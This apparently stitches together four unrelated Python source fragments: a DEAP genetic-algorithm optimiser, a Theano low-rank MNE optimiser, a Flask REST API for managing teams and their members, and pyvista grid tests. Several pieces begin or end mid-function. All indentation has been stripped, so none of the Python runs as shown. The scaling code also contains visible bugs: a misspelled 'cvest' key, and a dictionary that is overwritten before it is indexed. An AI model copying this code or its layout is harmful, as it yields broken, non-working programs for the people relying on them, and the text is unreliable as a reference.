# Invalidate the old fitness values
del child1.fitness.values
del child2.fitness.values
for mutant in offspring:
toolbox.mutate(mutant)
del mutant.fitness.values
# Evaluate the individuals with an invalid fitness
invalid_ind = [ind for ind in offspring if not ind.fitness.valid]
fitnesses = toolbox.map(toolbox.evaluate, invalid_ind)
for ind, fit in zip(invalid_ind, fitnesses):
ind.fitness.values = fit
print()
# The new population takes the best half of pop + offspring
pop = toolbox.selectNewPop(pop + offspring, len(pop))
# Record statistics for the final generation
logbook.record(gen=gen + 1, **stats.compile(pop))
# Save outputs
outputs = self.outputs
outputs['finalPopulation'] = pop
outputs['bestIndividuals'] = self.best_individuals(pop)
outputs['bestObjectiveValues'] = [ind.fitness.values for ind in outputs['bestIndividuals']]
print('Optimisation done!')
def best_individuals(self, pop):
"""Return the best individuals in the given population.
Finds those that have the best score in at least one objective. There
will thus be at most k individuals returned, where k is the number of
objectives.
:param pop: a list of individuals, assumed to be sorted by fitness
:returns: a list of the 'best' individuals within pop
"""
best = []
for i, obj in enumerate(self.objectives):
best_i = None
for ind in pop:
if best_i is None or (ind.fitness.values[i] * obj['weight'] >
best_i.fitness.values[i] * obj['weight']):
best_i = ind
best.append(best_i)
# We now need to remove duplicates and maintain the same ordering as in pop.
# It's non-trivial to hash individuals (and they're mutable), so we can't use a set.
# Even using the 'in' operator doesn't help as different objects with the same genome
# are treated as distinct!
# Instead we need to compare explicitly with ==
deduped = []
for ind in pop:
if ind in best:
for existing in deduped:
if ind == existing:
break
else:
deduped.append(ind)
assert len(deduped) <= len(self.objectives) # Paranoia
return deduped
def save_results(self):
"""Return key result information as a YAML text string.
This is suitable for being reloaded by load_results().
"""
import yaml
return yaml.dump(self.extract_outputs())
def load_results(self, stream):
"""Load details of the final population saved by save_results.
The save_results method will serialise key information about individuals
to a YAML document (text string). This method, if passed this data and
called on an Optimiser with the same objectives and variable definitions,
will reconstruct an equivalent outputs dictionary to the original optimiser.
This is primarily for use by the web interface, which needs to analyse the
results of saved experiments, but could be of utility to researchers using
the code directly as well.
:param stream: string or open file with YAML data
"""
self._initialise()
import yaml
loaded = yaml.safe_load(stream)
# Simple outputs copy directly
outputs = self.outputs
for name in ['bestObjectiveValues', 'seed']:
outputs[name] = loaded[name]
# For individuals we need to reconstruct proper objects
individuals = {}
for ind_data in loaded['finalPopulation']:
ind = individuals[id(ind_data)] = Individual(self, draw=False)
ind.error = ind_data['error']
ind.fitness.values = ind_data['fitness']
for var, var_data in zip(ind.variables, ind_data['variables']):
assert var_data['name'] == var.name
collection = getattr(var.component, var.collection)
spec = collection.spec[var.item]
var.value = spec.parse(var_data['value'])
outputs['finalPopulation'] = [individuals[id(ind_data)]
for ind_data in loaded['finalPopulation']]
outputs['bestIndividuals'] = [individuals[id(ind_data)]
for ind_data in loaded['bestIndividuals']]
# Below here are methods not intended for direct use by users.
def _initialise(self):
"""Prepare to run an optimisation."""
self._setup_toolbox()
# Set up the Fitness class for individuals to use
if hasattr(deap.creator, 'Fitness'):
del deap.creator.Fitness
weights = [obj['weight'] for obj in self.objectives]
deap.creator.create('Fitness', deap.base.Fitness, weights=weights)
# Determine a 'simulation failed' fitness for each objective
for obj in self.objectives:
obj['infinity'] = -obj['weight'] * float('inf')
self._setup_logbook()
def _objective_selector(self, obj):
"""Selector function for objectives.
Handles finding the right output (or other item) and ensuring it's a quantity
or plain number.
TODO: Better docs & name!
"""
component = obj['component'](self.base)
collection = getattr(component, obj['collection'])
value = get_item(collection, obj['item'])
if hasattr(value, 'magnitude'):
value = value.magnitude
assert isinstance(value, numbers.Number)
return value
def _setup_toolbox(self):
"""Set up the DEAP toolboxes of GA component functions."""
self.toolbox = toolbox = deap.base.Toolbox()
toolbox.register('population', deap.tools.initRepeat, list, self.make_individual)
toolbox.register('evaluate', self.evaluate_individual)
toolbox.register('mate', self.crossover)
toolbox.register('mutate', self.mutate)
# Selection depends on whether this is single- or multi-objective
if len(self.objectives) == 1:
toolbox.register('select', deap.tools.selTournament, tournsize=2)
toolbox.register('selectNewPop', deap.tools.selBest)
else:
toolbox.register('select', self.selTournamentNSGA2, tournsize=2)
toolbox.register('selectNewPop', deap.tools.selNSGA2)
def selTournamentNSGA2(self, individuals, k, tournsize):
"""Select k individuals by repeated NSGA2 tournaments.
:param individuals: A list of individuals to select from.
:param k: The number of individuals to select.
:param tournsize: The number of individuals participating in each tournament.
:returns: A list of selected individuals.
"""
| |
import numpy as np
import theano
import theano.tensor as T
from . import model
""" optimizer.py (module)
The optimizer module contains the Optimizer class that is used
to configure low-rank MNE models, initialize the solver, and
minimize the (possibly constrained and regularized) objective
function.
"""
class Optimizer(object):
""" Optimizer (class)
The Optimizer class is the interface used for constructing
and optimizing low-rank MNE models. This class is built
flexibly to allow for easy customization.
"""
def __init__(self, resp, feat, rank, cetype=None, citype=None, rtype=None, solver=None, **kwargs):
"""Initialize Optimizer class instantiation.
[inputs] (resp, feat, rank, cetype=None, citype=None,
rtype=None, solver=None, datasets=None, **kwargs)
resp: dict with keys 'train' 'cv' and 'test' mapping to
numpy array of the output labels with shape
(nsamp,) where nsamp is the number of data
samples. Each element of resp must be in the range
[0, 1].
feat: dict with keys 'train' 'cv' and 'test' mapping to
numpy array of the input features with shape
(nsamp, ndim) where ndim is the number of features.
rank: positive integer that sets the number of columns
of the matrices U and V(that both have shape (ndim,
rank)).
cetype: (optional) list of strings that tell the class
which equality constraints, if any, are being
used. Can set to None if no equality constraints are
used. Available equality constraints:
- "UV-linear-insert": these sets each U[:,k] =
csigns[k]*V[:,k] for all k in range(rank) and
directly imposes this constraint by substitution.
Note that csigns is a numpy array of binary
integers in {-1, 1} that sets the sign
relationship between each component of U and V.
csigns may be set using **kwargs. - "UV-linear":
these are the same constraints as UV-linear-insert
but instead of direct substitution the constraints
are imposed using the method Lagrange
multipliers. csigns must also be set through
**kwargs. - "UV-quadratic": these constraints are
the equality constraints defined by the upper
triangle of np.dot(U, U.T) == np.dot(V, V.T). -
"UV-bilinear": these constraints are the equality
constraints defined by the upper triangle (with
diagonal excluded) of np.dot(U, V.T) == np.dot(V,
U.T).
citype: (optional) list of strings that tell the class
which equality constraints, if any, are being
used. Can set to None if no equality constraints are
used. No inequality constraints are defined at this
time.
rtype: (optional) list of strings that tell the class
which regularization penalties, if any, should be
added to the objective function. Can set to None if
no penalty functions are applied. Available penalty
functions:
- "nuclear-norm": the nuclear-norm regularizes over
the Frobenius-norms of U and V and promotes
sparsity of the eigenvalue spectrum of J =
np.dot(U, V.T).
solver: (optional) must be set and initialized (using
class function init_solver) before beginning the
optimization. It is optional to set here, however.
"""
# initialize class members to standard arguments
self.rank = rank
self.cetype = cetype
self.citype = citype
self.rtype = rtype
self.solver = solver
# get data sizes
self.ntrain, self.ncv, self.ntest = feat['train'].shape[0], feat['cv'].shape[0], feat['test'].shape[0]
self.nsamp = self.ntrain + self.ncv + self.ntest
self.ndim = feat['train'].shape[1]
assert feat['test'].shape[1] == self.ndim
assert feat['cv'].shape[1] == self.ndim
assert set(feat.keys()) == set(resp.keys())
# initialize class members to keyword arguments
self.fscale = self.get_model_scaling(kwargs.get("fscale", None), defined_sets=resp.keys())
self.float_dtype = kwargs.get("float_dtype", np.float64)
self.precompile = kwargs.get("precompile", True)
# declare theano variables
self.x_dev = T.vector("x_dev")
self.lda_dev = T.vector("lambda_dev")
# set-up the model(s)
self.train_model, self.cv_model, self.test_model = self.config_models(resp, feat, **kwargs)
# build expressions for model(s)
self.build_expressions(self.train_model, grad=kwargs.get("compute_grad", True), hess=kwargs.get("compute_hess", False), **kwargs)
self.build_expressions(self.cv_model, grad=False, hess=False, **kwargs)
self.build_expressions(self.test_model, grad=False, hess=False, **kwargs)
# compile the expressions
if kwargs.get("precompile", True):
self.compile_expressions(self.train_model, grad=kwargs.get("compute_grad", True), hess=kwargs.get("compute_hess", False), **kwargs)
self.compile_expressions(self.cv_model, grad=False, hess=False, **kwargs)
self.compile_expressions(self.test_model, grad=False, hess=False, **kwargs)
# initilize solver
if solver is not None:
self.init_solver(**kwargs)
self.initialized = True
def get_model_scaling(self, fscale, datasets=None, **kwargs):
""" Determine the scaling of the negative log-likelihood objective
function (from mner.model.py).
[inputs] (fscale, **kwargs)
fscale: dict with keys "trainset", "cvset", and
"testset" with values that give the rescaling of the
objective function for the training set,
cross-validation set, and test set, respectively. If
a value is set to <=0 then the objective function is
scaled by the number of samples in each data
subset. If a value is set to None, then the
objective function is unscaled.
datasets: iterable of datasets available (a subset
of {'train', 'cv', 'test'})
[returns] fscale
fscale: see inputs.
"""
if fscale is None:
fscale = dict()
if 'train' in datasets:
fscale["trainset"] = 1.0
if 'cv' in datasets:
fscale["cvest"] = 1.0
if 'test' in datasets:
fscale["testset"] = 1.0
else:
fscale["trainset"] = 1.0
else:
if not isinstance(fscale, dict):
if isinstance(fscale, list) or isinstance(fscale, tuple):
tmp = fscale.copy()
fscale = dict()
idx = 0
if 'train' in datasets:
fscale["trainset"] = fscale[idx]
idx += 1
if 'cv' in datasets:
fscale["cvset"] = fscale[idx]
idx += 1
if 'test' in datasets:
fscale["testset"] = fscale[idx]
idx += 1
else:
fscale = {"trainset": fscale, "cvset": fscale, "testset": fscale}
# if the scaling is set to a negative number, set scaling to 1.0/samples
if "trainset" in fscale and fscale["trainset"] <= 0.0:
fscale["trainset"] = 1.0/self.ntrain
else:
fscale["trainset"] = 1.0
if "cvset" in fscale and fscale["cvset"] <= 0.0:
fscale["cvset"] = 1.0/self.ncv
else:
fscale["cvset"] = 1.0
if "testset" in fscale and fscale["testset"] <= 0.0:
fscale["testset"] = 1.0/self.ntest
else:
fscale["testset"] = 1.0
return fscale
def config_models(self, resp, feat, fscale=None, **kwargs):
""" Configure the low-rank MNE model(s) by instantiating the class
MNEr from mner.model.py.
[inputs] (resp, feat, fscale=None, **kwargs)
resp: see the class function __init__
feat: see the class function __init__
fscale: (optional) see the class function
get_model_scaling
[returns] (train_model, cv_model, test_model)
train_model: training set instantiation of class MNEr
with any regularization and constraints imposed.
cv_model: cross-validation set instantiation of class
MNEr (unregularized and no constraints)
test_model: test set instantiation of class MNEr
(unregularized and no constraints)
"""
self.use_vars = kwargs.get("use_vars", {'avar': True, 'hvar': True, 'UVvar': True})
self.use_consts = kwargs.get("use_consts", {'aconst': False, 'hconst': False, 'UVconst': False, 'Jconst': False})
train_model = model.MNEr(
resp['train'], feat['train'], self.rank, cetype=self.cetype, citype=self.citype,
rtype=self.rtype, fscale=self.fscale["trainset"], use_vars=self.use_vars,
use_consts=self.use_consts, x_dev=self.x_dev, **kwargs
)
if self.ncv > 0:
cv_model = model.MNEr(
resp['cv'], feat['cv'], self.rank, cetype=self.cetype, citype=self.citype,
fscale=self.fscale["cvset"], use_vars=self.use_vars, use_consts=self.use_consts,
x_dev=self.x_dev, **kwargs
)
else:
cv_model = None
if self.ntest > 0:
test_model = model.MNEr(
resp['test'], feat['test'], self.rank, cetype=self.cetype, citype=self.citype,
fscale=self.fscale["testset"], use_vars=self.use_vars, use_consts=self.use_consts,
x_dev=self.x_dev, **kwargs
)
else:
test_model = None
return (train_model, cv_model, test_model)
def build_expressions(self, model, grad=True, hess=False, **kwargs):
"""Build Theano expressions for the objective, constraints, gradient,
Jacobians, and Hessian, if applicable, for a given model.
[inputs] (model, grad=True, hess=False, **kwargs)
model: instantiation of class MNEr from mner.model.py
grad: (optional) Boolean; if True, builds the
gradient.
hess: (optional) Boolean; if True, builds the Hessian.
"""
if model is not None:
# build cost expression (gradient and hessian, if applicable)
# note that regularization is included in the cost expression
model.cost_expr(self.x_dev)
if grad:
model.cost_grad_expr(self.x_dev)
if hess:
model.cost_hess_expr(self.x_dev)
# build equality constraints expressions (gradient and hessian, if applicable)
if model.num_lagrange_cetypes:
model.ceq_expr(self.x_dev)
if grad:
model.ceq_jaco_expr(self.x_dev)
if hess:
model.ceq_hess_expr(self.x_dev, self.lda_dev)
# build inequality constraints expressions (gradient and hessian, if applicable)
if model.num_lagrange_citypes:
model.cineq_expr(self.x_dev)
if grad:
model.cineq_jaco_expr(self.x_dev)
if hess:
model.cineq_hess_expr(self.x_dev)
def compile_expressions(self, model, grad=True, hess=False, **kwargs):
"""Compile Theano expressions into device functions for a given
model.
[inputs] (model, grad=True, hess=False, **kwargs)
model: instantiation of class MNEr from mner.model.py
grad: (optional) Boolean; if True, compiles the
gradient
hess: (optional) Boolean; if True, compiles the
Hessian
"""
if model is not None:
# compile cost function (gradient and hessian, if applicable)
# note that this cost function includes regularization
model.compile_cost(self.x_dev)
if grad:
model.compile_cost_grad(self.x_dev)
if hess:
model.compile_cost_hess(self.x_dev)
# compile equality constraints (gradient and hessian, if applicable)
if model.cetype is not None and len(model.cetype):
model.compile_ceq(self.x_dev)
if grad:
model.compile_ceq_jaco(self.x_dev)
if hess:
model.compile_ceq_hess(self.x_dev, self.lda_dev)
# compile inequality constraints (gradient and hessian, if applicable)
if model.citype is not None and len(model.citype):
model.compile_cineq(self.x_dev)
if grad:
model.compile_cineq_jaco(self.x_dev)
if hess:
model.compile_cineq_hess(self.x_dev, self.lda_dev)
def init_solver(self, **kwargs):
""" Initialize the solver object.
[inputs] (**kwargs)
"""
if not hasattr(self.solver, 'initialized') | |
<gh_stars>1-10
from flask import abort, Response, jsonify, request
from flask_jwt_extended import current_user
from flask_restful import Resource
from sqlalchemy import exc
from datetime import date
from backend.app import db
from backend.common.permissions import roles_allowed
from backend.models import Team, Tribe, TeamUserLink, User, Answer
class TeamsRes(Resource):
"""Teams collection."""
@roles_allowed(['admin', 'editor'])
def post(self, tribe_id):
"""Create a new team.
Creates a new team with given name.
Roles allowed: admin, editor.
---
tags:
- teams
security:
- bearerAuth: []
consumes:
- application/json
parameters:
- in: path
name: tribe_id
required: true
description: Id of the tribe.
schema:
type: integer
- in: body
name: team
required: true
description: Team object.
schema:
$ref: '#/definitions/Team'
responses:
201:
description: Success.
headers:
Location:
description: URI of the created team.
type: string
403:
description: Forbidden. Requesting user doesn't have rights to\
this team.
400:
description: No tribe name given.
"""
Tribe.get_if_exists(tribe_id)
Tribe.validate_access(tribe_id, current_user)
json = request.get_json()
if 'name' not in json:
abort(400, 'No team data given')
team = Team(tribe_id, json['name'])
try:
db.session.add(team)
db.session.commit()
except exc.SQLAlchemyError:
abort(400)
response = jsonify(team.serialize())
response.headers['Location'] = '/tribes/%d/teams/%d' \
% (team.tribe_id, team.id)
response.status_code = 201
return response
@roles_allowed(['admin', 'editor'])
def get(self, tribe_id):
"""Get all teams in a tribe.
Roles allowed: admin, editor.
---
tags:
- teams
security:
- bearerAuth: []
parameters:
- in: path
name: tribe_id
required: true
description: Id of the tribe.
schema:
type: integer
responses:
200:
description: Success. Return list of teams.
404:
description: Tribe with requested id doesn't exist.
"""
Tribe.get_if_exists(tribe_id)
teams = (
Team.query
.filter_by(tribe_id=tribe_id, deleted=False)
.order_by(Team.name.asc())
.all()
)
response = jsonify([t.serialize() for t in teams])
response.status_code = 200
return response
class TeamRes(Resource):
"""Single team identified by id."""
@roles_allowed(['admin', 'editor'])
def get(self, team_id):
"""Get full info of a team.
Roles allowed: admin, editor.
---
tags:
- teams
security:
- bearerAuth: []
parameters:
- in: path
name: team_id
required: true
description: Id of the team.
schema:
type: integer
responses:
200:
description: Success. Returns team info.
404:
description: Team with requested id doesn't exist.
"""
team = Team.get_if_exists(team_id)
response = jsonify(team.serialize())
response.status_code = 200
return response
@roles_allowed(['admin', 'editor'])
def put(self, team_id):
"""Update team.
Roles allowed: admin, editor.
---
tags:
- teams
security:
- bearerAuth: []
consumes:
- application/json
parameters:
- in: path
name: team_id
required: true
description: Id of the team.
schema:
type: integer
- in: body
name: team
required: true
description: Team object.
schema:
$ref: '#/definitions/Team'
responses:
200:
description: Success. Returns team info.
400:
description: No team data given.
403:
description: Forbidden. Requesting user doesn't have rights to\
this team.
404:
description: Team with requested id doesn't exist.
"""
team = Team.get_if_exists(team_id)
Tribe.validate_access(team.tribe_id, current_user)
json = request.get_json()
if 'name' not in json or 'tribe_id' not in json:
abort(400, 'No team data given.')
Tribe.get_if_exists(json['tribe_id'])
team.name = json['name']
team.tribe_id = json['tribe_id']
try:
db.session.add(team)
db.session.commit()
except exc.SQLAlchemyError:
abort(400)
response = jsonify(team.serialize())
response.status_code = 200
return response
@roles_allowed(['admin', 'editor'])
def patch(self, team_id):
"""Partially update team.
Roles allowed: admin, editor.
---
tags:
- teams
security:
- bearerAuth: []
consumes:
- application/json
parameters:
- in: path
name: team_id
required: true
description: Id of the team.
schema:
type: integer
- in: body
name: team
required: true
description: Team object. Not all properties are required.
schema:
$ref: '#/definitions/Team'
responses:
200:
description: Success. Returns team info.
403:
description: Forbidden. Requesting user doesn't have rights to\
this team.
404:
description: Team with requested id doesn't exist.
"""
json = request.get_json()
if 'restore' in json:
team = Team.get_from_deleted(team_id)
Tribe.validate_access(team.tribe_id, current_user)
team.deleted = False
else:
team = Team.get_if_exists(team_id)
Tribe.validate_access(team.tribe_id, current_user)
if 'name' in json:
team.name = json['name']
if 'tribe_id' in json:
Tribe.get_if_exists(json['tribe_id'])
team.tribe_id = json['tribe_id']
try:
db.session.add(team)
db.session.commit()
except exc.SQLAlchemyError:
abort(400)
response = jsonify(team.serialize())
response.status_code = 200
return response
@roles_allowed(['admin', 'editor'])
def delete(self, team_id):
"""Delete team.
Roles allowed: admin, editor.
---
tags:
- teams
security:
- bearerAuth: []
parameters:
- in: path
name: team_id
required: true
description: Id of the team.
schema:
type: integer
responses:
204:
description: Success.
403:
description: Forbidden. Requesting user doesn't have rights to\
this team.
404:
description: Team with requested id doesn't exist.
"""
team = Team.get_if_exists(team_id)
Tribe.validate_access(team.tribe_id, current_user)
team.users.clear()
team.deleted = True
team.deleted_at = date.today()
try:
db.session.add(team)
db.session.commit()
except exc.SQLAlchemyError:
abort(400)
response = Response()
response.status_code = 204
return response
class TeamManagersRes(Resource):
"""Collection of managers of the specific team."""
@roles_allowed(['admin', 'editor'])
def get(self, team_id):
"""Get managers of the team.
Roles allowed: admin, editor.
---
tags:
- teams
security:
- bearerAuth: []
properties:
- in: path
name: team_id
required: true
description: Id of the team.
schema:
- type: integer
responses:
200:
description: Success. Returns list of the managers.
403:
description: Forbidden. Requesting user doesn't have rights to\
this team.
404:
description: Team with requested id doesn't exist.
"""
team = Team.get_if_exists(team_id)
Tribe.validate_access(team.tribe_id, current_user)
manager_links = (
TeamUserLink.query
.filter_by(team_id=team_id, manager=True)
.join(TeamUserLink.user)
.order_by(User.full_name.asc())
.all()
)
response = jsonify([l.user.serialize() for l in manager_links])
response.status_code = 200
return response
class TeamManagerRes(Resource):
"""Single team manager resource."""
@roles_allowed(['admin', 'editor'])
def put(self, team_id, user_id):
"""Add manager to the team.
Roles allowed: admin, editor.
---
tags:
- teams
security:
- bearerAuth: []
properties:
- in: path
name: team_id
required: true
description: Id of the team.
schema:
- type: integer
- in: path
name: user_id
required: true
description: Id of the user.
schema:
- type: integer
responses:
201:
description: Success.
204:
description: User is already a manager in this team.
403:
description: Forbidden. Requesting user doesn't have rights to\
this team.
404:
description: Team or user with requested id doesn't exist.
"""
team = Team.get_if_exists(team_id)
user = User.get_if_exists(user_id)
Tribe.validate_access(team.tribe_id, current_user)
if int(team_id) in user.managing_ids():
response = Response()
response.status_code = 204
return response
manager_link = TeamUserLink(team_id=team_id,
user_id=user_id,
manager=True)
team.users.append(manager_link)
try:
db.session.add(user)
db.session.add(team)
db.session.commit()
except exc.SQLAlchemyError:
abort(400)
response = Response()
response.status_code = 201
return response
@roles_allowed(['admin', 'editor'])
def delete(self, team_id, user_id):
"""Remove manager from the team.
Roles allowed: admin, editor.
---
tags:
- teams
security:
- bearerAuth: []
properties:
- in: path
name: team_id
required: true
description: Id of the team.
schema:
- type: integer
- in: path
name: user_id
required: true
description: Id of the user.
schema:
- type: integer
responses:
204:
description: Success.
403:
description: Forbidden. Requesting user doesn't have rights to\
this team.
404:
description: Team or user with requested id doesn't exist.
"""
team = Team.get_if_exists(team_id)
user = User.get_if_exists(user_id)
Tribe.validate_access(team.tribe_id, current_user)
manager_link = (
TeamUserLink.query
.filter_by(user_id=user_id, team_id=team_id, manager=True)
.first()
)
if manager_link is None:
abort(404, 'Requested manager does not exist.')
try:
db.session.delete(manager_link)
db.session.commit()
except exc.SQLAlchemyError:
abort(400)
user.revalidate()
response = Response()
response.status_code = 204
return response
class TeamUsersRes(Resource):
"""Collection of team members."""
@roles_allowed(['admin', 'editor'])
def get(self, team_id):
"""Get members of the team.
Roles allowed: admin, editor.
---
tags:
- teams
security:
- bearerAuth: []
properties:
- in: path
name: team_id
required: true
description: Id of the team.
schema:
- type: integer
responses:
200:
description: Success. Returns list of the members.
403:
description: Forbidden. Requesting user doesn't have rights to\
this team.
404:
description: Team with requested id doesn't exist.
"""
team = Team.get_if_exists(team_id)
Tribe.validate_access(team.tribe_id, current_user)
user_links = (
TeamUserLink.query
.filter_by(team_id=team_id, manager=False)
.join(TeamUserLink.user)
.order_by(User.full_name)
.all()
)
response = jsonify([l.user.serialize() for l in user_links])
response.status_code = 200
return response
class TeamUserRes(Resource):
"""Single team member."""
@roles_allowed(['admin', 'editor'])
def put(self, team_id, user_id):
"""Add member to the team.
Roles allowed: admin, editor.
---
tags:
- teams
security:
- bearerAuth: []
properties:
- in: path
name: team_id
required: true
description: Id of the team.
schema:
- type: integer
- in: path
name: user_id
required: true
description: Id of the user.
schema:
- type: integer
responses:
201:
description: Success.
204:
description: User is already a member in this team.
403:
description: Forbidden. Requesting user doesn't have rights to\
this team.
404:
description: Team or user with requested id doesn't exist.
"""
team = Team.get_if_exists(team_id)
user = User.get_if_exists(user_id)
Tribe.validate_access(team.tribe_id, current_user)
if int(team_id) in user.team_ids():
response = Response()
response.status_code = 204
return response
user_link = TeamUserLink(team_id=team_id,
user_id=user_id,
manager=False)
team.users.append(user_link)
try:
db.session.add(user)
db.session.add(team)
db.session.commit()
except exc.SQLAlchemyError:
abort(400)
response = Response()
response.status_code = 201
return response
@roles_allowed(['admin', 'editor'])
def delete(self, team_id, user_id):
"""Remove member from the team.
| |
import os
import numpy as np
import pytest
import vtk
import pyvista
from pyvista import examples
from pyvista.plotting import system_supports_plotting
beam = pyvista.UnstructuredGrid(examples.hexbeamfile)
# create structured grid
x = np.arange(-10, 10, 2)
y = np.arange(-10, 10, 2)
z = np.arange(-10, 10, 2)
x, y, z = np.meshgrid(x, y, z)
sgrid = pyvista.StructuredGrid(x, y, z)
try:
test_path = os.path.dirname(os.path.abspath(__file__))
test_data_path = os.path.join(test_path, 'test_data')
except:
test_path = '/home/alex/afrl/python/source/pyvista/tests'
def test_volume():
assert beam.volume > 0.0
@pytest.mark.skipif(not system_supports_plotting(), reason="Requires system to support plotting")
def test_struct_example():
# create and plot structured grid
grid = examples.load_structured()
cpos = grid.plot(off_screen=True) # basic plot
assert isinstance(cpos, pyvista.CameraPosition)
# Plot mean curvature
cpos_curv = grid.plot_curvature(off_screen=True)
assert isinstance(cpos_curv, pyvista.CameraPosition)
def test_init_from_structured():
unstruct_grid = pyvista.UnstructuredGrid(sgrid)
assert unstruct_grid.points.shape[0] == x.size
assert np.all(unstruct_grid.celltypes == 12)
def test_init_from_unstructured():
grid = pyvista.UnstructuredGrid(beam, deep=True)
grid.points += 1
assert not np.any(grid.points == beam.points)
def test_init_bad_input():
with pytest.raises(Exception):
unstruct_grid = pyvista.UnstructuredGrid(np.array(1))
with pytest.raises(Exception):
unstruct_grid = pyvista.UnstructuredGrid(np.array(1),
np.array(1),
np.array(1),
'woa')
def test_init_from_arrays():
offset = np.array([0, 9], np.int8)
cells = np.array([8, 0, 1, 2, 3, 4, 5, 6, 7, 8, 8, 9, 10, 11, 12, 13, 14, 15])
cell_type = np.array([vtk.VTK_HEXAHEDRON, vtk.VTK_HEXAHEDRON], np.int32)
cell1 = np.array([[0, 0, 0],
[1, 0, 0],
[1, 1, 0],
[0, 1, 0],
[0, 0, 1],
[1, 0, 1],
[1, 1, 1],
[0, 1, 1]])
cell2 = np.array([[0, 0, 2],
[1, 0, 2],
[1, 1, 2],
[0, 1, 2],
[0, 0, 3],
[1, 0, 3],
[1, 1, 3],
[0, 1, 3]])
points = np.vstack((cell1, cell2)).astype(np.int32)
grid = pyvista.UnstructuredGrid(offset, cells, cell_type, points)
assert grid.n_cells == 2
assert np.allclose(grid.offset, offset)
def test_surface_indices():
surf = beam.extract_surface()
surf_ind = surf.point_arrays['vtkOriginalPointIds']
assert np.allclose(surf_ind, beam.surface_indices())
def test_extract_feature_edges():
edges = beam.extract_feature_edges(90)
assert edges.n_points
edges = beam.extract_feature_edges(180)
assert not edges.n_points
@pytest.mark.parametrize('binary', [True, False])
@pytest.mark.parametrize('extension', ['vtu', 'vtk'])
def test_save(extension, binary, tmpdir):
filename = str(tmpdir.mkdir("tmpdir").join('tmp.%s' % extension))
beam.save(filename, binary)
grid = pyvista.UnstructuredGrid(filename)
assert grid.cells.shape == beam.cells.shape
assert grid.points.shape == beam.points.shape
grid = pyvista.read(filename)
assert grid.cells.shape == beam.cells.shape
assert grid.points.shape == beam.points.shape
assert isinstance(grid, pyvista.UnstructuredGrid)
def test_init_bad_filename():
filename = os.path.join(test_path, 'test_grid.py')
with pytest.raises(Exception):
grid = pyvista.UnstructuredGrid(filename)
with pytest.raises(Exception):
grid = pyvista.UnstructuredGrid('not a file')
def test_save_bad_extension():
with pytest.raises(Exception):
grid = pyvista.UnstructuredGrid('file.abc')
def test_linear_copy():
# need a grid with quadratic cells
lgrid = beam.linear_copy()
assert np.all(lgrid.celltypes < 20)
def test_extract_cells():
ind = [1, 2, 3]
part_beam = beam.extract_cells(ind)
assert part_beam.n_cells == len(ind)
assert part_beam.n_points < beam.n_points
mask = np.zeros(beam.n_cells, np.bool)
mask[:3] = True
part_beam = beam.extract_cells(mask)
assert part_beam.n_cells == len(ind)
assert part_beam.n_points < beam.n_points
def test_merge():
grid = beam.copy()
grid.points[:, 0] += 1
unmerged = grid.merge(beam, inplace=False, merge_points=False)
grid.merge(beam, inplace=True, merge_points=True)
assert grid.n_points > beam.n_points
assert grid.n_points < unmerged.n_points
def test_merge_not_main():
grid = beam.copy()
grid.points[:, 0] += 1
unmerged = grid.merge(beam, inplace=False, merge_points=False,
main_has_priority=False)
grid.merge(beam, inplace=True, merge_points=True)
assert grid.n_points > beam.n_points
assert grid.n_points < unmerged.n_points
def test_merge_list():
grid_a = beam.copy()
grid_a.points[:, 0] += 1
grid_b = beam.copy()
grid_b.points[:, 1] += 1
grid_a.merge([beam, grid_b], inplace=True, merge_points=True)
assert grid_a.n_points > beam.n_points
def test_init_structured():
xrng = np.arange(-10, 10, 2)
yrng = np.arange(-10, 10, 2)
zrng = np.arange(-10, 10, 2)
x, y, z = np.meshgrid(xrng, yrng, zrng)
grid = pyvista.StructuredGrid(x, y, z)
assert np.allclose(sgrid.x, x)
assert np.allclose(sgrid.y, y)
assert np.allclose(sgrid.z, z)
grid_a = pyvista.StructuredGrid(grid)
assert np.allclose(grid_a.points, grid.points)
def test_invalid_init_structured():
xrng = np.arange(-10, 10, 2)
yrng = np.arange(-10, 10, 2)
zrng = np.arange(-10, 10, 2)
x, y, z = np.meshgrid(xrng, yrng, zrng)
z = z[:, :, :2]
with pytest.raises(Exception):
grid = pyvista.StructuredGrid(x, y, z)
@pytest.mark.parametrize('binary', [True, False])
@pytest.mark.parametrize('extension', ['vts', 'vtk'])
def test_save_structured(extension, binary, tmpdir):
filename = str(tmpdir.mkdir("tmpdir").join('tmp.%s' % extension))
sgrid.save(filename, binary)
grid = pyvista.StructuredGrid(filename)
assert grid.x.shape == sgrid.y.shape
assert grid.n_cells
assert grid.points.shape == sgrid.points.shape
grid = pyvista.read(filename)
assert grid.x.shape == sgrid.y.shape
assert grid.n_cells
assert grid.points.shape == sgrid.points.shape
assert isinstance(grid, pyvista.StructuredGrid)
def test_load_structured_bad_filename():
with pytest.raises(Exception):
pyvista.StructuredGrid('not a file')
filename = os.path.join(test_path, 'test_grid.py')
with pytest.raises(Exception):
grid = pyvista.StructuredGrid(filename)
def test_create_rectilinear_grid_from_specs():
# 3D example
xrng = np.arange(-10, 10, 2)
yrng = np.arange(-10, 10, 5)
zrng = np.arange(-10, 10, 1)
grid = pyvista.RectilinearGrid(xrng)
assert grid.n_cells == 9
assert grid.n_points == 10
grid = pyvista.RectilinearGrid(xrng, yrng)
assert grid.n_cells == 9*3
assert grid.n_points == 10*4
grid = pyvista.RectilinearGrid(xrng, yrng, zrng)
assert grid.n_cells == 9*3*19
assert grid.n_points == 10*4*20
assert grid.bounds == [-10.0,8.0, -10.0,5.0, -10.0,9.0]
# 2D example
cell_spacings = np.array([1., 1., 2., 2., 5., 10.])
x_coordinates = np.cumsum(cell_spacings)
y_coordinates = np.cumsum(cell_spacings)
grid = pyvista.RectilinearGrid(x_coordinates, y_coordinates)
assert grid.n_cells == 5*5
assert grid.n_points == 6*6
assert grid.bounds == [1.,21., 1.,21., 0.,0.]
def test_create_rectilinear_after_init():
x = np.array([0,1,2])
y = np.array([0,5,8])
z = np.array([3,2,1])
grid = pyvista.RectilinearGrid()
grid.x = x
assert grid.dimensions == [3, 1, 1]
grid.y = y
assert grid.dimensions == [3, 3, 1]
grid.z = z
assert grid.dimensions == [3, 3, 3]
assert np.allclose(grid.x, x)
assert np.allclose(grid.y, y)
assert np.allclose(grid.z, z)
def test_create_rectilinear_grid_from_file():
grid = examples.load_rectilinear()
assert grid.n_cells == 16146
assert grid.n_points == 18144
assert grid.bounds == [-350.0,1350.0, -400.0,1350.0, -850.0,0.0]
assert grid.n_arrays == 1
def test_read_rectilinear_grid_from_file():
grid = pyvista.read(examples.rectfile)
assert grid.n_cells == 16146
assert grid.n_points == 18144
